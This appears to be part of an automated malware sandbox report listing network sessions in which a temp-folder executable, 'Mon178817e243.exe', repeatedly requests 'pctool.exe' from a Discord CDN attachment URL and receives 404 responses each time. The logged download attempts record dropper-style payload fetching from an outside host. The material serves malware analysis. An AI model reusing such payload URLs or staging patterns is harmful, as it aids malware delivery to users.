                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AlbKeO9YG1SHnNTf7uiMHu%2BmstTyqQHCewYnX%2BhAivdRBgUnR9N1PjT4YfPzDbK%2BTkmmkdEfYVysU%2F38hXeVHmISVAHrrMpkJIXNhboAgEqWWnoZU8rYG%2FTJAK2wRrQVEwMctg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=o1iLNz6bj2Uohj1MQihczC58zgng.Mp7vvGnaWyOeUU-1724230728299-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696c63ccd7c34b-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:48 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      21 | 192.168.2.4 | 60021 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:58:53 UTC | 128 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:58:54 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:54 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=ey1ufPKZPn3objdNt5Cb1EVnz1pHpARgxVwYD11NvaM-1724230734-1.0.1.1-eWAQyhWuRFeo6D9wxxFXWvH5OlYjYkU3lf9FKbCN4GrjLoRZ6mqLFPV3Fo9JQYN.1D36KMug3vFXXI8Px1d9iw; path=/; expires=Wed, 21-Aug-24 09:28:54 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BeB5N3U1PMFtU6NGsqbmeLZGwRaEF5viUTU8yDk7gz4TTMVsh%2Fpvts2ZtjPhDh5zf3RCpIhRyg%2FJg%2F1JeLnajeiM674agm0QjdDRQ%2Bv0VNgjCTwm6wiFGVYr4PGqnzeG9XXzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=qnge2mMS7zgI4BEBwYdNSuL2PI4AyqmQ0IoU6WFYMVo-1724230734033-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696c87adc20f42-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:54 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      22 | 192.168.2.4 | 60026 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:58:59 UTC | 128 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:58:59 UTC | 1043 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:59 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=inQIpPXoGjHTdRR16lfmIf8AlIOVJ4beJ4kAfo8Fs3Q-1724230739-1.0.1.1-X4Zdyrv6fnzmLBRFO.QE1HHVib1.2b2n7_WEseV2xmhdI.iKWNrneSt90JdW_43JLyBEGLHl7r5eTvO7qKxZYg; path=/; expires=Wed, 21-Aug-24 09:28:59 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3SIXvAicy4JP2wQA9TBs9SnSUHmtc%2B3dRtrPRKoZvePGomVq9xJ56A8e0qTmyuZvgXwS7pSENMzgvuyqrJ2lViqakWh7IcIe5XqC2QJ0svm9iO7tepFH6VH7adrOoUeAYgxFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=0Pq.Whoi9etDomuC2APzSn3GmrJQ8OiU8oe45jDs2wA-1724230739688-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696caaffba7cab-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:59 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      23 | 192.168.2.4 | 60029 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:59:05 UTC | 128 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:59:05 UTC | 1047 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:05 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=c6PYn6T0c0Iin.fXT3mH2FYc_JGbSq_aS.CxzV6SgT4-1724230745-1.0.1.1-jznGwhXsPNyewk2AG.ef7uVfgac1zWNCW4qRFzfy0lYbhHJokWJWwtM.hq7D0nkSNzZJxAwo6QQI.qyWMqyn0g; path=/; expires=Wed, 21-Aug-24 09:29:05 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WVuJaTRU1GT172zocGCC%2BLkCimohU2CDTp6HBIUNRmeZizF9jfUKp%2FUjmb2IFdFmQKIR6fwBVqZK0BlBejVtwEWsj3Y71ns38bekz7%2FIM55YNaXQf1fNPvri4rYqe0MBottEAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=Dq6QkRfgMEtW1GMBBzV5FfC4CdIRSN5bcwmXUOm5HYE-1724230745345-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696cce598f0fa8-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:05 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      24 | 192.168.2.4 | 60032 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:59:11 UTC | 128 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:59:11 UTC | 1049 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:11 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=VQTvQJ3y.uOD5g5c5xaWQNBhmM188o6rIDLGA17ECvE-1724230751-1.0.1.1-l4ROs4WATUeNi3_gvAbRIOgRx6QYhRIGzBZd3HN6JxvjiMze8qjNl362KSX1su1MIr_QwzpgaqyCGjG0ZnCutg; path=/; expires=Wed, 21-Aug-24 09:29:11 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KSMCMHkPUKKo69PhlkvUbfaq2w4M%2Fc2xgPXaCHYscTvO5rECAksPm6wn8GFnxyMseH%2BXJXDZTDaVYxfeDRtQKG0FVgbQu%2B2woN9YiUbVchUQlaHjVD%2BkyN5ghpwoA2DYEswpEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=qlm_WPNa1tr.980IQ_.FMEitkNc841bngWtopOaTO.U-1724230751170-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696cf2b8da4231-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:11 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      25 | 192.168.2.4 | 60037 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:59:16 UTC | 128 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:59:16 UTC | 1045 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:16 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=Pyqw3b0Di8OWxj7id.OtiugXOixtBidedcXK4GKwRB0-1724230756-1.0.1.1-rz7kJXfS127Fd.FbNPKGQWFWcMQL0AnlHjf5PdQYRaCk49b0MHiDwAADHu5MDs9Z6VCL2pJ_FgrzLpUOLbir3A; path=/; expires=Wed, 21-Aug-24 09:29:16 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NPLlUIMKxdOg3bSkR9WN3hmG06gSa7BVJ3vm0rI3ue57IfTF7GcY8dWK7sSoaUA6g3MnFJ9c1xuG2lzklCZe4lgRWXTmWjREaCOTIxGTM9%2BW8Nw8hTcY%2FiI5Ihapu13b5V3pVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=On.XWPCCSsi80_kI0t9mbY238fDy6F7wO85JdzOGESg-1724230756797-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696d15e9af0f77-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:16 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      26 | 192.168.2.4 | 60041 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:59:22 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:59:22 UTC | 1049 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:22 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=r5q_MK8YpFMYPNbcc1.kX8RIiVI1rtNeb4bFxocPKYo-1724230762-1.0.1.1-8Hdd2zz1IHHPvVuBEh.DDYTo4N4tsRJAHAj6yNUcWr3mMDFkfb_DnpFF07XPLwVj.mnZDzEmyBIbnJhRohWrOg; path=/; expires=Wed, 21-Aug-24 09:29:22 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mnKxc6qMscffapdK5t%2Fnee0CXxMVpH%2Fr4F1tc5%2FgWark2gCs95NXGVVmPJtBYCeep1s03ek9li1qVIK1i59aBruDdQB%2BrrdvSoSfpuogiXXM4Tf29fTllI17bv1qv5m6fOioxw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=bUG0XFfKSAkJAqxm47.1o7wP2qf9SbJqpD8R6ET13K4-1724230762433-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696d392f7c0fa8-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:22 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      27 | 192.168.2.4 | 60046 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:59:27 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:59:28 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:28 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=lUWhQ041.lMfsVwD_ObAqgnetF1e6faH6a42qxBSUC4-1724230768-1.0.1.1-ui6c2j7YChLvaWYB2_1ykF_FQKVrPBA6dx2rva5NyVMvwS_y_VdQA6lcVX8ogJ.XfNCZ5tNxSgFczuGbGr08Bg; path=/; expires=Wed, 21-Aug-24 09:29:28 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aIvyOxxUQQzeoC%2F2iCgIfEesd%2FfZqebLYLgR2WG8HlQvR%2Fivgch5wDcLzbo%2FUWcckSc5tzaHPoePVAoKA3Omvr4bZly%2F8pWnytd8D8iyHM2fLyHNcgLbRyugMzmdlZIF8mzyRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=M3quJcqeq9eAhjRyx1k7x1SjPA_U8AwtU4Uc0fUXMtI-1724230768081-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696d5c6de532e2-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:28 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      28 | 192.168.2.4 | 60050 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:59:33 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:59:33 UTC | 1055 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:33 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=V_YOpyhs7fWfw_vz2CWkj5fKz7r_7WhhtcWixudnSSw-1724230773-1.0.1.1-OracUGoDq0mWHrpIN9tj7OMnHBQP1y8oRRPWE0_EsmDFRMaS.aZxwGoh_e9g8b3twi3zFoht7tK6O0btn9nfOQ; path=/; expires=Wed, 21-Aug-24 09:29:33 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cm1ZYh%2BUy03nSO56alZ%2F1nKYT%2B5E%2F6jR4uD2Gn9gArx%2FTdsIP6Cg54mNmciCVCBIg%2FXc6pfVAGTSBP0t6xlRAQF%2F7Emlu8pyob5WrGZr2QcFnhAxwUlXnX8MhsvWHL4ewqqOQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=1EsbuVwMRkLUBKh2Lp9i_6pU0rAVxa0kCETiLsoSo6s-1724230773697-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696d7f7c5f159f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:33 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.460054162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:59:39 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:59:39 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:39 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=VsfeA5YgZU0Alz8.JLAyCajoPQkSuqlniiEt_j69nYo-1724230779-1.0.1.1-RkPFY9dJiAKhFlkDvlNOnJMNXWoB8ebDCCx7XmVieINAE55ouduS.fj13.vPotom183wMaAFvEVAhb80nYmQ.A; path=/; expires=Wed, 21-Aug-24 09:29:39 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2FCiPLmv5iDCAvLc9iwjzkbIAUWHDyub%2BUeGp4KnaSHBtPlkBpKV072T9mGPBYjPCMLCwwcXdoqmDC%2BGnUl6PvMOo6%2FC0zyoFiVjlnLiqMKu2rjd6Ps9WKnctqaR%2BT0h4KzVGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=zL.9I.dDqc9HmiC5tbwb8GcpOGQER.hBqM6ceH0TugY-1724230779332-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696da2b84143c8-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:39 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      30 | 192.168.2.4 | 60058 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:59:44 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:59:45 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:44 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=FMKPU8XYSsF9F0E8B8.nIZRWilKXobToQ0q0_kbPgbs-1724230784-1.0.1.1-0ZxROcpUAUcpmOQ6zkW17EVvZwI26kQ7.Gpsvld8046KgUHFY3tRRKGyT3qzGrrsE7DpPNhZ8uRxMF2h5xIItA; path=/; expires=Wed, 21-Aug-24 09:29:44 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pFSphp%2BEx8xB2aVO%2Bhu4lJkJohZmqW7rn1pJpqUKKcTwiCA%2BRZEpHby87N69J%2FzoBGa4P1OfAa5YDuYyEUyC%2FpNqzCo7PpTYWAk0JYCPHHWKYC0MaKVYs7yLKH41vpAKxGWssA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=u7uVKjud3VTit6vZ4rnlUu29y6DA_m68kF3DnWkReFI-1724230784999-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696dc63cbe1835-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:45 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      31 | 192.168.2.4 | 60062 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:59:50 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:59:50 UTC | 1045 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:50 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=77JwWXGdx7zwtHQr8u0GrFbJscrwxdofdu5xXN3Bj5Q-1724230790-1.0.1.1-dQ.zCkxriWAduqA4m26I02cvWE50qYc5VyiawPsOifJYMtEaZW5wGSrecfTLdiMC5dFpHgoFFxZZOZyDlRpqrw; path=/; expires=Wed, 21-Aug-24 09:29:50 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SmOK%2FFnaoNgi1y3qLWSDcofay3t6NskD9PG8QN5rxCWdy3BLsIGFgXyRWNHxWmFHVQMBeRF2HYTsdXy4WD499L8AvkPIL3VkTb%2B4HoW1tRV8KGN2Qg00n50RHUeKJozbDmkM0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=_u.u67H888eUwBaugIH0aV9p8M77z21FJ3a_xZn4fEA-1724230790644-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696de96ef9c434-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:50 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      32 | 192.168.2.4 | 60067 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:59:56 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:59:56 UTC | 1047 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:56 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=LxyzNDXBY2Kk9o2NsZ3JhND.lw_ckFVrWHhyU4xix3g-1724230796-1.0.1.1-00TUFqbCUQuqKsDCO6Rj1dsXNLy0oagAF0tR.csjiOVDduaOm52Ewl3UJq7J_6g5_5_nQ99QZw9mC_8w_lAoYQ; path=/; expires=Wed, 21-Aug-24 09:29:56 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKqWpgAQN8iVnLheOYqL8GcBef0W46owytrM81Jnne%2BcwwBPpTkf9vB8GDnxg9w%2BsvBof03rQ82YQIFFfJkPPc70%2FFWAVU0a0GXgm5hYQMOSalZKTXvk6NqjyuDlzLRcOUeAZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=TWzxHPZwrNypd0f72ewZQEbdNf358qbiQowmXtkIKTc-1724230796254-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696e0c8fc50f60-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:56 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      33 | 192.168.2.4 | 60071 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 09:00:01 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:01 UTC | 1059 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:01 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=UPm4koZUTri1ZBlqVF8jXvLi3g.jW9N_cjK8O4BHZrg-1724230801-1.0.1.1-bLwlr_wS1EaRgraLoj2du7UVMmsmyFhQcDBwMlinMg2nG35wzVgDpSkDhXM5AdD1FE.j03I6OcOOYGsKHrkqGQ; path=/; expires=Wed, 21-Aug-24 09:30:01 GMT; domain=.discordapp.com; HttpOnly; Secure
